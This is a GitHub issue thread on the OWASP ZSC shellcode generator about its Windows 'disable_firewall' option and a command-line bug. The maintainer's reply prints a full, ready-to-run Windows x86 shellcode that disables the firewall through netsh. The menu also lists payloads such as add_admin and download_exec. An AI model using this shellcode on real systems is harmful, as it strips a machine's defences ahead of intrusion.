search

OWASP / ZSC

OWASP ZSC - Shellcode/Obfuscate Code Generator https://www.secologist.com/
https://www.secologist.com/
Other
646 stars 217 forks source link

Windows disable firewall #99

Closed jowasp closed 8 years ago

jowasp commented 8 years ago

Could you provide more details which parameters and how this option should work? I don't get any specific parameters, not sure how this should work zsc/shellcode/generate/windows_x86/disable_firewall>

Ali-Razmjoo commented 8 years ago

Hi johanna, as you see this function don't need any inputs.

[!] disable_firewall()
[+] windows_x86/disable_firewall/none
[+] windows_x86/disable_firewall/xor_random
[+] windows_x86/disable_firewall/add_random
[+] windows_x86/disable_firewall/sub_random
[+] windows_x86/disable_firewall/xor_yourvalue
zsc> shellcode
zsc/shellcode> generate
zsc/shellcode/generate>
linux_x86   osx_x86     windows_x86
zsc/shellcode/generate> windows_x86
zsc/shellcode/generate/windows_x86>
add_admin        create_file      dir_create       disable_firewall download_exec    download_tofile  exec
zsc/shellcode/generate/windows_x86> d
dir_create       disable_firewall download_exec    download_tofile
zsc/shellcode/generate/windows_x86> disable_firewall
zsc/shellcode/generate/windows_x86/disable_firewall> [I just pushed enter]

[+] none
[+] xor_random
[+] add_random
[+] sub_random
[+] xor_yourvalue

[+] enter encode type
zsc/shellcode/generate/windows_x86/disable_firewall/encode_type> none

Output assembly code?(y or n)> n
Output shellcode to screen?(y or n)> y
[+] Generated shellcode is:
\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x53\x52\x31\xc9\x51\xb9\x78\x65\x63\x61\x51\x83\x6c\x24\x03\x61\x68\x57\x69\x6e\x45\x54\x53\xff\xd2\x83\xc4\x08\x59\x50\x31\xc9\x51\x68\x90\x90\x90\x65\x59\xc1\xe9\x10\xc1\xe9\x08\x51\x68\x73\x61\x62\x6c\x68\x65\x20\x64\x69\x68\x70\x6d\x6f\x64\x68\x65\x74\x20\x6f\x68\x6c\x6c\x20\x73\x68\x72\x65\x77\x61\x68\x68\x20\x66\x69\x68\x6e\x65\x74\x73\x31\xdb\x89\xe3\x31\xc9\x41\x51\x53\xff\xd0\x83\xc4\x2c\x5a\x5b\x31\xc9\xb9\x65\x73\x73\x61\x51\x83\x6c\x24\x03\x61\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x53\xff\xd2\x31\xc9\x51\xff\xd0

Shellcode output to a .c file?(y or n)> n
zsc>

when I choosed disable_firewall and press tab and i've seen nothing appear [no inputs] so I just pushed enter. and it goes next step. but there is a bug in command line version, it doesn't work with zsc.py -p windows_x86/disable_firewall/none or zsc.py -p windows_x86/disable_firewall/none -i and zsc.py -p windows_x86/disable_firewall/none -i "" so it needs to be fix.

thanks.

Ali-Razmjoo commented 8 years ago

fixed, let me know if there is anything else, thanks.